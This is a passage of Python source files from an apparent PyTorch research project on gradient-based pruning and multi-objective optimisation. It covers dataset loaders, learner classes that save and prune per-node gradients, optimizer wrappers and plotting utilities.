opener.addheaders = [('User-agent', 'Mozilla/5.0')]
urllib.request.install_opener(opener)
if configs['dataset'] == 'mnist':
transform = transforms.Compose(
[transforms.Resize((32, 32)),
transforms.ToTensor(),
transforms.Normalize((0.1307,), (0.3081,))])
train_data = datasets.MNIST(root=dataset_path, train=True,
download=True, transform=transform)
test_data = datasets.MNIST(root=dataset_path, train=False,
download=False, transform=transform)
elif configs['dataset'] == 'cifar100':
normalize = transforms.Normalize(mean=[0.4914, 0.4822, 0.4465],
std=[0.2023, 0.1994, 0.2010])
train_transform = transforms.Compose([
transforms.Pad(4),
transforms.RandomCrop(32),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
normalize,
])
test_transform=transforms.Compose([
transforms.ToTensor(),
normalize,
])
train_data = datasets.CIFAR100(root=dataset_path+'\cifar100', train=True,
download=True, transform=train_transform)
test_data = datasets.CIFAR100(root=dataset_path+'\cifar100', train=False,
download=False, transform=test_transform)
elif configs['dataset'] == 'cifar10':
normalize = transforms.Normalize(mean=[0.4914, 0.4822, 0.4465],
std=[0.2023, 0.1994, 0.2010])
train_transform=transforms.Compose([
transforms.Pad(4),
transforms.RandomCrop(32),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
normalize,
])
test_transform=transforms.Compose([
transforms.ToTensor(),
normalize,
])
train_data = datasets.CIFAR10(root=dataset_path+'\cifar10', train=True,
download=True, transform=train_transform)
test_data = datasets.CIFAR10(root=dataset_path+'\cifar10', train=False,
download=False, transform=test_transform)
elif configs['dataset']=='fashionmnist':
train_transform=transforms.Compose([
transforms.Resize((32, 32)),
transforms.ToTensor(),
transforms.Normalize((0.5,), (0.5,))
])
test_transform=transforms.Compose([
transforms.Resize((32, 32)),
transforms.ToTensor(),
transforms.Normalize((0.5,), (0.5,))
])
train_data=datasets.FashionMNIST(root=dataset_path, download=True, train=True, transform=train_transform)
test_data=datasets.FashionMNIST(root=dataset_path, download=False, train=False, transform=test_transform)
else:
raise NotImplementedError
return train_data, test_data
```
#### File: ml_benchmark/Learner/base_learner.py
```python
import torch
from Dataset.dataload import data_loader
import pickle
import torch.nn as nn
import torch.optim as optim
from torch.optim import lr_scheduler
from torch.utils.tensorboard import SummaryWriter
from six.moves import urllib
import os
from utils import EarlyStopping
import time
import numpy as np
import matplotlib.pyplot as plt
from CustomOptimizer.pcgrad import *
from CustomLoss.crossentropyloss import CrossEntropyLoss,ModifyTargetCrossEntropyLoss
CUSTOM_LOSS={
'crossentropy':CrossEntropyLoss,
'modifytargetcrossentropy':ModifyTargetCrossEntropyLoss,
}
class BaseLearner():
def __init__(self,model,time_data,file_path,configs):
self.model = model
self.optimizer = self.model.optim
if 'train_moo' == configs['mode']:
reduction='none'
self.optimizer=PCGrad_MOO(self.optimizer)
elif 'train_moo_v2' == configs['mode']:
reduction='none'
self.optimizer=PCGrad_MOO_V2(self.optimizer)
elif 'baseline_moo' == configs['mode']:
reduction='mean'
self.optimizer=PCGrad_MOO_Baseline(self.optimizer)
elif 'baseline_moo_v2' == configs['mode']: #충돌 확인용
reduction='none'
self.optimizer=PCGrad_MOO_Baseline_V2(self.optimizer)
elif 'baseline_moo_v3' == configs['mode']: #충돌 확인용
reduction='none'
self.optimizer=PCGrad_MOO_Baseline_V3(self.optimizer)
elif configs['mode']=='train_mtl':
self.optimizer=PCGrad(self.optimizer)
reduction='none'
elif configs['mode']=='train_mtl_v2':
self.optimizer=PCGrad_v2(self.optimizer)
reduction='none'
else:
reduction='mean'
if configs['custom_loss']==None:
self.criterion = self.model.loss
self.criterion=self.criterion.__class__(reduction=reduction) # grad vector (no scalar)
else:
if 'custom_loss_reduction' not in configs.keys():
custom_loss_reduction='mean'
else:
custom_loss_reduction=configs['custom_loss_reduction']
self.criterion=CUSTOM_LOSS[configs['custom_loss']](self.model.loss,custom_loss_reduction=custom_loss_reduction,reduction=reduction)
self.scheduler = self.model.scheduler
self.configs = configs
self.grad_list = list()
if configs['batch_size']==128 or configs['batch_size']==64:
self.log_interval=50
elif configs ['batch_size']<=32:
self.log_interval=100
else:
print("Use Default log interval")
self.log_interval=100
self.device = self.configs['device']
# data
opener = urllib.request.build_opener()
opener.addheaders = [('User-agent', 'Mozilla/5.0')]
urllib.request.install_opener(opener)
self.train_loader, self.test_loader = data_loader(self.configs)
# Tensorboard
self.current_path = file_path
self.logWriter = SummaryWriter(os.path.join(
self.current_path, 'training_data', time_data))
self.time_data = time_data
self.early_stopping = EarlyStopping(
self.current_path, time_data, configs, patience=self.configs['patience'], verbose=True)
if self.configs['colab'] == True:
self.making_path = os.path.join('drive', 'MyDrive', 'grad_data')
else:
self.making_path = os.path.join(self.current_path, 'grad_data')
if os.path.exists(self.making_path) == False:
os.mkdir(self.making_path)
if os.path.exists(os.path.join(self.making_path, 'tmp')) == False:
os.mkdir(os.path.join(self.making_path, 'tmp'))
# grad list
self.grad_list = list()
def save_grad(self, epochs):
# Save all grad to the file
if self.configs['grad_save'] == True:
self.grad_list.append([])
param_size = list()
params_write = list()
tik = time.time()
if self.configs['model'] == 'lenet300_100' or self.configs['model']=='lenet5':#lenet300 100
for t, params in enumerate(self.grad_list):
if t == 1:
for i, p in enumerate(params): # 각 layer의 params
param_size.append(p.size())
# elem
params_write.append(torch.cat(params, dim=0).unsqueeze(0))
# node
if t % 100 == 0:
print("\r step {} done".format(t), end='')
# elif self.configs['model'] == 'lenet5': #TODO
# for t, params in enumerate(self.grad_list):
# if t == 1:
# for i, p in enumerate(params): # 각 layer의 params
# param_size.append(p.size())
# # elem
# # print(params)
# params_write.append(torch.cat(params, dim=0).unsqueeze(0))
# # node
# if t % 100 == 0:
# print("\r step {} done".format(t), end='')
else: # vgg16
import platform
for epoch in range(1,epochs+1):
i = 0
epoch_data = list()
# check exist
while os.path.exists(os.path.join(self.making_path, 'tmp', '{}_{}e_{}.npy'.format(self.time_data, epoch, i))) == True:
batch_idx_data = np.load(os.path.join(
self.making_path, 'tmp', '{}_{}e_{}.npy'.format(self.time_data, epoch, i)))
epoch_data.append(torch.from_numpy(batch_idx_data))
i += 1
params_write.append(torch.cat(epoch_data, dim=0))
print("\r {}epoch processing done".format(epoch),end='')
print("\n")
write_data = torch.cat(params_write, dim=0)
if self.configs['model'] != 'lenet300_100' and self.configs['model']!='lenet5':
for epoch in range(1,epochs+1):
i = 0
epoch_data = list()
# check exist
while os.path.exists(os.path.join(self.making_path, 'tmp', '{}_{}e_{}.npy'.format(self.time_data, epoch, i))) == True:
# remove
if platform.system() == 'Windows':
os.system('del {}'.format(os.path.join(
self.making_path, 'tmp', '{}_{}e_{}.npy'.format(self.time_data, epoch, i))))
else:
os.system('rm {}'.format(os.path.join(
self.making_path, 'tmp', '{}_{}e_{}.npy'.format(self.time_data, epoch, i))))
i+=1
print("\r {}epoch processing done".format(epoch),end='')
print("\n Write data size:", write_data.size())
np.save(os.path.join(self.making_path, 'grad_{}'.format(
self.time_data)), write_data.numpy()) # npy save
tok = time.time()
print('play_time for saving:', tok-tik, "s")
print('size: {}'.format(len(params_write)))
'''
Save params
'''
return self.configs
def _save_grad(self, p_groups, epoch, batch_idx):
# save grad to the list
if self.configs['grad_save'] == True:
save_grad_list = list()
for p in p_groups:
for l, p_layers in enumerate(p['params']):
# node, rest
if self.configs['model'] == 'lenet300_100' or self.configs['model']=='lenet5':
if len(p_layers.size()) > 1: # weight filtering
p_nodes = p_layers.grad.cpu().detach().clone()
# print(p_nodes.size())
for n, p_node in enumerate(p_nodes):
self.grad_list[-1].append(torch.cat([p_node.mean().view(-1), p_node.norm(
).view(-1), torch.nan_to_num(p_node.var()).view(-1)], dim=0).unsqueeze(0))
# elif self.configs['model'] == 'lenet5':#TODO
# if len(p_layers.size()) > 1: # weight filtering
# p_node = p_layers.grad.view(
# -1).cpu().detach().clone()
# # if i==0:
# # print(p_node[50:75])
# # print(p_node.size())
# self.grad_list[-1].append(p_node)
else: # vgg
if len(p_layers.size()) > 1:
p_nodes = p_layers.grad.cpu().detach().clone()
for n, p_node in enumerate(p_nodes):
save_grad_list.append(torch.cat([p_node.mean().view(-1), p_node.norm(
).view(-1), torch.nan_to_num(p_node.var()).view(-1)], dim=0).unsqueeze(0))
p_layers.to(self.device)
if 'lenet' not in self.configs['model']:
npy_path = os.path.join(self.making_path, 'tmp', '{}_{}e_{}.npy'.format(
self.time_data, epoch, batch_idx))
row_data = torch.cat(save_grad_list, dim=0).unsqueeze(0)
np.save(npy_path, row_data.numpy())
del save_grad_list
del row_data
def _show_grad(self,output, target,p_groups,epochs,batch_idx):
if batch_idx%100==0:
criterion=nn.CrossEntropyLoss(reduction='none')
self.optimizer.zero_grad()
loss=criterion(output, target)
flatten_grads=list()
for l in loss:
flatten_grad=list()
l.backward(retain_graph=True)
for params in p_groups:
for p in params['params']:
flatten_grad.append(p.grad.view(-1))
flatten_grad=torch.cat(flatten_grad,dim=0)
flatten_grads.append(flatten_grad.norm().cpu())
plt.clf()
plt.plot(flatten_grads,flatten_grads,'bo')
plt.xlabel('no_pcgrad')
plt.ylabel('no_pcgrad')
plt.title('no_pcgrad norm (batch size: {})'.format(self.configs['batch_size']))
plt.savefig('./grad_data/png/no_pcgrad/{}batch_{}e_{}i.png'.format(self.configs['batch_size'],epochs,batch_idx))
criterion=nn.CrossEntropyLoss(reduction='mean')
self.optimizer.zero_grad()
loss=criterion(output,target)
loss.backward()
```
#### File: ml_benchmark/Learner/classic_learner.py
```python
import time
import os
import time
import numpy as np
import torch
from Learner.base_learner import BaseLearner
import sys
class ClassicLearner(BaseLearner):
def __init__(self, model, time_data,file_path, configs):
super(ClassicLearner,self).__init__(model,time_data,file_path,configs)
# pruning
if configs['mode']=='train_weight_prune':
self.grad_off_mask = list()
self.grad_norm_cum = dict()
for l, num_nodes in enumerate(self.model.node_size_list):
for n in range(num_nodes):
self.grad_norm_cum['{}l_{}n'.format(l, n)] = 0.0
self.grad_off_mask.append(torch.zeros(
num_nodes, dtype=torch.bool, device=self.device)) # grad=0으로 끄는 mask
# gradient 꺼지는 빈도확인
self.grad_off_freq_cum = 0
# 꺼지는 시기
self.grad_turn_off_epoch = self.configs['grad_off_epoch']
# # 다시 켤 노드 지정
self.grad_turn_on_dict=None
# self.grad_turn_on_dict = {
# 2: [0, 31, 58, 68, 73]
# # 3:[2,12,27,31,50,82]
# }
print(self.grad_turn_on_dict)
def run(self):
print("Training {} epochs".format(self.configs['epochs']))
eval_accuracy, eval_loss = 0.0, 0.0
train_accuracy, train_loss = 0.0, 0.0
best_eval_accuracy=0.0
# Train
for epoch in range(self.configs['start_epoch'], self.configs['epochs'] + 1):
train_accuracy, train_loss = self._train(epoch)
eval_accuracy, eval_loss = self._eval()
self.scheduler.step()
loss_dict = {'train': train_loss, 'eval': eval_loss}
accuracy_dict = {'train': train_accuracy, 'eval': eval_accuracy}
self.logWriter.add_scalars('loss', loss_dict, epoch)
self.logWriter.add_scalars('accuracy', accuracy_dict, epoch)
self.early_stopping(eval_loss, self.model)
if self.early_stopping.early_stop:
print("Early stopping")
break
if self.device == 'cuda':
torch.cuda.empty_cache()
if best_eval_accuracy<eval_accuracy:
best_eval_accuracy=eval_accuracy
print("Best Accuracy in evaluation: {:.2f}".format(best_eval_accuracy) )
if self.configs['mode'] == 'train_weight_prune':
print("before prune")
for layer in self.optimizer.param_groups[0]['params']:
print(layer.size())
print("after prune")
for mask_layer in self.grad_off_mask:
print("Pruned weight", torch.nonzero(mask_layer).size())
for layer in self.optimizer.param_groups[0]['params']:
print("After Weight Prune", torch.nonzero(layer).size())
configs = self.save_grad(epoch)
return configs
def _train(self, epoch):
tik = time.time()
self.model.train() # train모드로 설정
running_loss = 0.0
correct = 0
num_training_data = len(self.train_loader.dataset)
# defalut is mean of mini-batchsamples, loss type설정
# loss함수에 softmax 함수가 포함되어있음
# 몇개씩(batch size) 로더에서 가져올지 정함 #enumerate로 batch_idx표현
p_groups=self.optimizer.param_groups
for batch_idx, (data, target) in enumerate(self.train_loader):
data, target = data.to(self.device), target.to(
self.device) # gpu로 올림
self.optimizer.zero_grad() # optimizer zero로 초기화
# weight prune #TODO
self.prune_weight(p_groups,epoch,batch_idx)
# model에서 입력과 출력이 나옴 batch 수만큼 들어가서 batch수만큼 결과가 나옴 (1개 인풋 1개 아웃풋 아님)
output = self.model(data)
loss = self.criterion(output, target) # 결과와 target을 비교하여 계산
# get the index of the max log-probability
pred = output.argmax(dim=1, keepdim=True)
correct += pred.eq(target.view_as(pred)).sum().item()
loss.backward(retain_graph=True) # 역전파
p_groups = self.optimizer.param_groups # group에 각 layer별 파라미터
# show grad
#self._show_grad(output, target,p_groups,epoch,batch_idx)
# visual grad
self._save_conflict_grad(p_groups,epoch,target)
# grad prune
self._prune_grad(p_groups, epoch, batch_idx)
# grad save(prune후 save)
self._save_grad(p_groups, epoch, batch_idx)
# prune 이후 optimizer step
self.optimizer.step()
running_loss += loss.item()
if batch_idx % self.log_interval == 0:
print('\r Train Epoch: {} [{}/{} ({:.0f}%)]\tLoss: {:.6f}'.format(epoch, batch_idx * len(
data), num_training_data, 100.0 * batch_idx / len(self.train_loader), loss.item()), end='')
if self.configs['log_extraction']=='true':
sys.stdout.flush()
running_loss /= num_training_data
tok = time.time()
running_accuracy = 100.0 * correct / float(num_training_data)
print('\nTrain Loss: {:.6f}'.format(running_loss), 'Learning Time: {:.1f}s'.format(
tok-tik), 'Accuracy: {}/{} ({:.2f}%)'.format(correct, num_training_data, 100.0*correct/num_training_data))
return running_accuracy, running_loss
def _eval(self):
self.model.eval()
eval_loss = 0
correct = 0
class_correct_dict=dict()
class_total_dict=dict()
for i in range(self.configs['num_classes']):
class_correct_dict[i]=0
class_total_dict[i]=0
with torch.no_grad():
for data, target in self.test_loader:
data, target = data.to(self.device), target.to(self.device)
output = self.model(data)
loss = self.criterion(output, target)
eval_loss += loss.item()
# get the index of the max log-probability
pred = output.argmax(dim=1, keepdim=True)
correct += pred.eq(target.view_as(pred)).sum().item()
for label in target.unique():
# print(label,pred.eq(target.view_as(pred))[target==label].sum().item())
class_correct_dict[int(label)]+=pred.eq(target.view_as(pred))[target==int(label)].sum().item()
class_total_dict[int(label)]+=(target==label).sum().item()
for keys in class_correct_dict.keys():
print('{} class : {}/{} [{:.2f}%]'.format(keys,class_correct_dict[keys],class_total_dict[keys],100.0*class_correct_dict[keys]/class_total_dict[keys]))
eval_loss = eval_loss / len(self.test_loader.dataset)
print('\nTest set: Average loss: {:.4f}, Accuracy: {}/{} ({:.2f}%)\n'.format(
eval_loss, correct, len(self.test_loader.dataset),
100.0 * correct / float(len(self.test_loader.dataset))))
if self.configs['log_extraction']=='true':
sys.stdout.flush()
eval_accuracy = 100.0*correct/float(len(self.test_loader.dataset))
return eval_accuracy, eval_loss
#########################################################################################################
###########################################################################################################
def _prune_grad(self, p_groups, epoch, batch_idx):
# pruning mask generator
l = -1 # 처음 layer는 0으로 증가해서 maxpooling과 같은 요소를 피하기 위함
if self.configs['mode'] == 'train_weight_prune':
for p in p_groups:
for i, p_layers in enumerate(p['params']):
# first and last layer live
# or p['params'][0].size()==p_layers.size() or p['params'][1].size()==p_layers.size(): # 마지막 layer는 output이므로 배제
if p['params'][-1].size() == p_layers.size() or p['params'][-2].size() == p_layers.size():
continue
else:
# weight filtering
if len(p_layers.size()) > 1 and epoch <= self.grad_turn_off_epoch+1:
l += 1 # layer
p_nodes = p_layers.grad.cpu().detach().clone() # prune in grad
# p_nodes = p_layers.grad.cpu().detach().clone() # prune in weight
for n, p_node in enumerate(p_nodes):
# 1. gradient cumulative값이 일정 이하이면 모두 gradient prune
if epoch < self.grad_turn_off_epoch+1:
self.grad_norm_cum['{}l_{}n'.format(
l, n)] += p_node.norm().view(-1) # cumulative value
p_layers.to(self.device)
# pruning the gradient
if epoch > self.grad_turn_off_epoch:
l = -1 # -1부터해서 0으로 시작하게함
for p in p_groups:
for i, p_layers in enumerate(p['params']):
if len(p_layers.size()) > 1: # weight filtering
l += 1 # layer
# print(p_layers.data[self.grad_off_mask[l]].sum(),'a')
p_layers.grad[self.grad_off_mask[l]] = torch.zeros_like(
p_layers.grad[self.grad_off_mask[l]]) # weight prune
else:
p_layers.grad[self.grad_off_mask[l]] = torch.zeros_like(
p_layers.grad[self.grad_off_mask[l]]) # bias prune
def turn_requires_grad_(self,p_groups,on_off):
if self.configs['mode']=='train_weight_prune':
for p in p_groups:
for i,p_layers in enumerate(p['params']):
p_layers.requires_grad_(on_off)
def prune_weight(self, p_groups,epoch,batch_idx):
if self.configs['mode'] == 'train_weight_prune' and epoch >= self.grad_turn_off_epoch+1:
l = -1 # -1부터해서 0으로 시작하게함, for bias로 여겨지는 avgpooling,maxpooling회피용
#turn off judgement
if epoch == self.grad_turn_off_epoch+1 and batch_idx == 0:
for p in p_groups:
for i,p_layers in enumerate(p['params']):
if p['params'][-1].size() == p_layers.size() or p['params'][-2].size() == p_layers.size():
continue
if len(p_layers.size())>1: #weight filtering
l+=1
for n, p_node in enumerate(p_layers):
if self.grad_norm_cum['{}l_{}n'.format(l, n)] < self.configs['threshold']:
self.grad_off_mask[l][n] = True
print('{}l_{}n grad_off'.format(l, n))
self.grad_off_freq_cum += 1
# 끌필요없는 것 다시 켜는 것
if epoch == self.grad_turn_off_epoch+1 and batch_idx == 0 and self.grad_turn_on_dict is not None:
print("Turn on the designated node=====")
for l_key in self.grad_turn_on_dict.keys():
for n in self.grad_turn_on_dict[l_key]:
self.grad_off_mask[l_key][n] = False
print("{}l_{}n grad Turn on and No Prune".format(l_key, n))
print("End Turn on=====================")
# Record Prune Rate
self.logWriter.add_scalar(
'train/grad_off_freq_cum', self.grad_off_freq_cum, epoch)
self.turn_requires_grad_(p_groups,on_off=False)
#weight prune
l = -1 # -1부터해서 0으로 시작하게함, for bias로 여겨지는 avgpooling,maxpooling회피용
for p in p_groups:
for i,p_layers in enumerate(p['params']):
if len(p_layers.size())>1: #weight filtering
l+=1 #layer
# print(p_layers.data[self.grad_off_mask[l]].sum(),'b')
p_layers.data[self.grad_off_mask[l]]=torch.zeros_like(p_layers.data[self.grad_off_mask[l]])
else:# bias
p_layers.data[self.grad_off_mask[l]]=torch.zeros_like(p_layers.data[self.grad_off_mask[l]])
#print(l,"layer",torch.nonzero(p_layers.grad).size()," ",p_layers.grad.size())
self.turn_requires_grad_(p_groups,on_off=True)
```
#### File: ml_benchmark/Learner/cvx_learner.py
```python
import time
import os
import sys
import torch
from torch import optim
from Learner.base_learner import BaseLearner
from CustomOptimizer.cvx import CVXOptimizer
class CVXLearner(BaseLearner):
def __init__(self, model, time_data,file_path, configs):
super(CVXLearner,self).__init__(model,time_data,file_path,configs)
if 'train_cvx' in configs['mode']:
reduction='none'
self.optimizer=CVXOptimizer(self.optimizer)
else:
raise NotImplementedError
self.criterion=self.criterion.__class__(reduction=reduction) # grad vector (no scalar)
if os.path.exists(os.path.join(self.making_path, time_data)) == False:
os.mkdir(os.path.join(self.making_path, time_data))
def run(self):
print("Training {} epochs".format(self.configs['epochs']))
best_accuracy=0.0
# Train
for epoch in range(1, self.configs['epochs'] + 1):
print('Learning rate: {}'.format(self.scheduler.optimizer.param_groups[0]['lr']))
train_metric = self._train(epoch)
eval_metric = self._eval()
self.scheduler.step()
loss_dict = {'train': train_metric['loss'], 'eval': eval_metric['loss']}
accuracy_dict = {'train': train_metric['accuracy'], 'eval': eval_metric['accuracy']}
self.logWriter.add_scalars('loss', loss_dict, epoch)
self.logWriter.add_scalars('accuracy', accuracy_dict, epoch)
best_accuracy=max(eval_metric['accuracy'],best_accuracy)
self.early_stopping(eval_metric['loss'], self.model)
if self.early_stopping.early_stop:
print("Early stopping")
break
if self.device == 'gpu':
torch.cuda.empty_cache()
print("Best Accuracy: "+str(best_accuracy))
self.configs['train_end_epoch']=epoch
configs = self.save_grad(epoch)
return configs
def _train(self, epoch):
tik = time.time()
self.model.train() # train모드로 설정
running_loss = 0.0
total_len_data=0
len_data=dict()
class_correct_dict=dict()
for i in range(self.configs['num_classes']):
class_correct_dict[i]=0
len_data[i]=0
current_len_data=0
total_len_data=len(self.train_loader.dataset)
for idx,(data,target) in enumerate(self.train_loader):
data, target = data.to(self.device), target.to(self.device) # gpu로 올림
output = self.model(data)
loss = self.criterion(output, target)
pred = output.argmax(dim=1, keepdim=True)
for class_idx in target.unique():
class_correct_dict[int(class_idx)]+=pred.eq(target.view_as(pred))[target==class_idx].sum().item()
len_data[int(class_idx)]+=(target==class_idx).sum()
running_loss+=loss.mean().item()
self.optimizer.zero_grad()
self.optimizer.cvx_backward(loss)
self.optimizer.step()
current_len_data+=target.size()[0]
if idx % self.log_interval == 0:
print('\r Train Epoch: {} [{}/{} ({:.0f}%)]\tLoss: {:.6f}'.format(epoch, current_len_data, total_len_data ,
100.0 * float(current_len_data) / float(total_len_data), loss.mean().item()), end='')
tok=time.time()
if self.configs['log_extraction']=='true':
sys.stdout.flush()
print("\n ============================\nTrain Learning Time:{:.2f}s \t Class Accuracy".format(tok-tik))
total_correct=0
for class_correct_key in class_correct_dict.keys():
class_accur=100.0*float(class_correct_dict[class_correct_key])/float(len_data[class_correct_key])
print('{} class :{}/{} {:2f}%'.format(class_correct_key,class_correct_dict[class_correct_key],len_data[class_correct_key],class_accur))
total_correct+=class_correct_dict[class_correct_key]
running_accuracy=100.0*float(total_correct)/float(total_len_data)
train_metric={'accuracy':running_accuracy,'loss': running_loss/float(total_len_data)}
print('{} epoch Total Accuracy: {:.2f}%, Total Loss: {}\n'.format(epoch,train_metric['accuracy'],train_metric['loss']))
return train_metric
def _eval(self):
self.model.eval()
eval_loss = 0
correct = 0
class_correct_dict=dict()
class_total_dict=dict()
for i in range(self.configs['num_classes']):
class_correct_dict[i]=0
class_total_dict[i]=0
with torch.no_grad():
for data, target in self.test_loader:
data, target = data.to(self.device), target.to(self.device)
output = self.model(data)
loss = self.criterion(output, target)
eval_loss += loss.mean().item()
# get the index of the max log-probability
pred = output.argmax(dim=1, keepdim=True)
for label in target.unique():
# print(label,pred.eq(target.view_as(pred))[target==label].sum().item())
class_correct_dict[int(label)]+=pred.eq(target.view_as(pred))[target==label].sum().item()
class_total_dict[int(label)]+=(target==label).sum().item()
eval_loss = eval_loss / len(self.test_loader.dataset)
correct=0
print("=================Eval=================")
for class_correct_key in class_correct_dict.keys():
correct+=class_correct_dict[class_correct_key]
class_accur=100.0*float(class_correct_dict[class_correct_key])/class_total_dict[class_correct_key]
print('{} class :{}/{} {:2f}%'.format(class_correct_key,class_correct_dict[class_correct_key],class_total_dict[class_correct_key],class_accur))
print('Test set: Average loss: {:.4f}, Accuracy: {}/{} ({:.2f}%)\n==================='.format(
eval_loss, correct, len(self.test_loader.dataset),
100.0 * correct / float(len(self.test_loader.dataset))))
if self.configs['log_extraction']=='true':
sys.stdout.flush()
eval_accuracy = 100.0*correct/float(len(self.test_loader.dataset))
eval_metric={'accuracy':eval_accuracy,'loss': eval_loss}
return eval_metric
```
#### File: ml_benchmark/Model/baseNet.py
```python
def get_hyperparams(nn_type):
if nn_type == 'lenet5':
dataset = 'mnist'
epochs = 60
lr=1e-2
momentum=0.9
elif nn_type == 'vgg16':
dataset = 'cifar10'
epochs = 300
lr=1e-2
momentum=0.9
elif nn_type=='lenet300_100':
dataset = 'mnist'
epochs = 60
lr=1e-2
momentum=0.9
elif 'resnet' in nn_type:
dataset='cifar10'
lr=1e-1
epochs=200
momentum=0.9
elif nn_type=='convnet':
dataset = 'cifar10'
epochs = 200
lr=1e-2
momentum=0.9
elif nn_type=='alexnet':
dataset='cifar10'
epochs=200
lr=1e-2
momentum=0.9
else:
print("No algorithm available")
raise NotImplementedError
return dataset,epochs,lr,momentum
class BaseNet():
def __init__(self,configs):
if configs['dataset'] in ['cifar10','fashionmnist','mnist']:
configs['num_classes']=10
elif configs['dataset']=='cifar100':
configs['num_classes']=100
else:#imagenet
configs['num_classes']=1000
if configs['model'] == 'lenet5':
from Model.lenet5 import LeNet5
model = LeNet5(configs).to(configs['device'])
elif configs['model'][:3] == 'vgg':
from Model.vgg import VGG
model = VGG(configs).to(configs['device'])
# print(model)
elif configs['model']=='lenet300_100':
from Model.lenet300_100 import LeNet_300_100
model = LeNet_300_100(configs).to(configs['device'])
elif configs['model'][:6]=='resnet':
from Model.resnet import ResNet
model = ResNet(configs).to(configs['device'])
elif configs['model']=='convnet':
from Model.convnet import ConvNet
model = ConvNet(configs).to(configs['device'])
elif configs['model']=='alexnet':
from Model.alexnet import AlexNet
model = AlexNet(configs).to(configs['device'])
else:
print("No Model")
raise NotImplementedError
self.model=model
if 'offkd' in configs['mode'] or 'onkd' in configs['mode']:
import copy
KDCONFIGS=copy.deepcopy(configs)
KDCONFIGS['model']=configs['pretrained_model']
if configs['pretrained_model'] == 'lenet5':
from Model.lenet5 import LeNet5
pretrained_model = LeNet5(KDCONFIGS).to(configs['device'])
elif configs['pretrained_model'][:3] == 'vgg':
from Model.vgg import VGG
pretrained_model = VGG(KDCONFIGS).to(configs['device'])
# print(pretrained_model)
elif configs['pretrained_model']=='lenet300_100':
from Model.lenet300_100 import LeNet_300_100
pretrained_model = LeNet_300_100(KDCONFIGS).to(configs['device'])
elif configs['pretrained_model'][:6]=='resnet':
from Model.resnet import ResNet
pretrained_model = ResNet(KDCONFIGS).to(configs['device'])
elif configs['pretrained_model']=='convnet':
from Model.convnet import ConvNet
pretrained_model = ConvNet(KDCONFIGS).to(configs['device'])
elif configs['pretrained_model']=='alexnet':
from Model.alexnet import AlexNet
pretrained_model = AlexNet(KDCONFIGS).to(configs['device'])
else:
print("No Model")
raise NotImplementedError
import torch
if 'offkd' in configs['mode']:
pretrained_model.load_state_dict(torch.load('./pretrained_data/{}_{}.pth'.format(configs['pretrained_model'],configs['dataset'])))
self.pretrained_model=pretrained_model.to(configs['device'])
```
#### File: ml_benchmark/Pruning/LRP.py
```python
import torch
import torch.optim as optim
class LateralInhibition():#LRN
def __init__(self,optimizer:optim):
self._optim=optimizer
@property
def optimizer(self):
return self._optim
@property
def param_groups(self):
return self._optim.param_groups
def step(self):
return self._optim.step()
def backward(self,loss):
grads, shapes, has_grads = self._pack_grad(loss)
#grad = self._unflatten_grad(grads, shapes)
#self._set_grad(grad)
for group in self._optim.param_groups:
for g_layers,p in zip(grads,group['params']):
if len(g_layers.size()) > 1: # weight filtering
if len(g_layers.size())==4: #CNN
b_matrix=self._lateral_inhibition(g_layers)
elif len(g_layers.size())==2: #FC
b_matrix=self._lateral_inhibition(g_layers)
else: #Bias
b_matrix=self._lateral_inhibition(g_layers)
p.grad=b_matrix.clone()
def _lateral_inhibition(self,grad_layers):
k,alpha,beta,num=2, 1e-4, 0.75, 5
b_matrix=torch.zeros_like(grad_layers)
for n,g_node in enumerate(grad_layers):
lower_idx=int(max(0,n-num/2))
upper_idx=int(min(grad_layers.size()[0]-1,n+num/2))
gain=torch.pow(k+alpha*torch.square(grad_layers[lower_idx:upper_idx]).sum(),beta)
b_matrix[n]=torch.div(g_node,gain)
return b_matrix
### Original
def _pack_grad(self, loss):
self._optim.zero_grad(set_to_none=True)
loss.backward()
grad, shape, has_grad = self._retrieve_grad()
return grad, shape, has_grad
### Original
def _retrieve_grad(self):
grad, shape, has_grad = [], [], []
for group in self._optim.param_groups:
for p in group['params']:
# if p.grad is None: continue
# tackle the multi-head scenario
if p.grad is None:
shape.append(p.shape)
grad.append(torch.zeros_like(p).to(p.device))
has_grad.append(torch.zeros_like(p).to(p.device))
continue
shape.append(p.grad.shape)
grad.append(p.grad.clone())
has_grad.append(torch.ones_like(p).to(p.device))
return grad, shape, has_grad
```
#### File: ml_benchmark/Visualization/using_pyplot.py
```python
import torch
import numpy as np
import os
import matplotlib.pyplot as plt
import math
class Pyplot_node():
def __init__(self, fileTensor, config, path,file_name):
NUM_ROWS = config['epochs'] * \
math.ceil(60000.0/float(config['batch_size']))
if config['model'] == 'lenet5':
from NeuralNet.lenet5 import w_size_list, b_size_list, NN_size_list, model_list, kernel_size_list
elif config['model'][:3] == 'vgg':
from NeuralNet.vgg import get_nn_config
w_size_list, b_size_list, NN_size_list, model_list, kernel_size_list = get_nn_config(
config['model'])
if os.path.exists(os.path.join(path,file_name)) == False:
os.mkdir(os.path.join(path,file_name))
dir_list=['node_info','node_integrated_info']
for dir in dir_list:
if os.path.exists(os.path.join(path,file_name,dir)) == False:
os.mkdir(os.path.join(path,file_name,dir))
self.path = path
self.file_name=file_name
self.w_size_list = w_size_list
self.b_size_list = b_size_list
self.NN_size_list = NN_size_list
self.model_list = model_list
self.kernel_size_list = kernel_size_list
self.nodes_integrated = dict()
total_data = fileTensor.clone()
self.time_list = list()
for t, data in enumerate(total_data):
tmp_data = data.detach().clone()
self.time_list.append(t)
if t % 100 == 0:
print('\r {} line complete'.format(t), end='')
for l, num_w in enumerate(b_size_list): # b인 이유: node관찰이므로
# weight
node_w = tmp_data[:num_w].detach().clone()
tmp_data = tmp_data[num_w:]
for n, node_info in enumerate(node_w): # node 단위
if t == 0:
self.nodes_integrated['avg_{}l_{}n'.format(
l, n)] = list()
self.nodes_integrated['norm_{}l_{}n'.format(
l, n)] = list()
self.nodes_integrated['var_{}l_{}n'.format(
l, n)] = list()
self.nodes_integrated['avg_{}l_{}n'.format(
l, n)].append(node_info[0])
self.nodes_integrated['norm_{}l_{}n'.format(
l, n)].append(node_info[1])
self.nodes_integrated['var_{}l_{}n'.format(
l, n)].append(node_info[2])
print("File Visualization Start")
self.info_type_list = ['avg', 'avg_cum',
'norm', 'norm_cum', 'var', 'var_cum']
def time_write_(self, layer, node, info_type):
plt.clf()
plt.plot(
self.time_list, torch.tensor(self.nodes_integrated['{}_{}l_{}n'.format(info_type, layer, node)]).tolist())
plt.xlabel('iter')
plt.ylabel('{} of grad in node'.format(info_type))
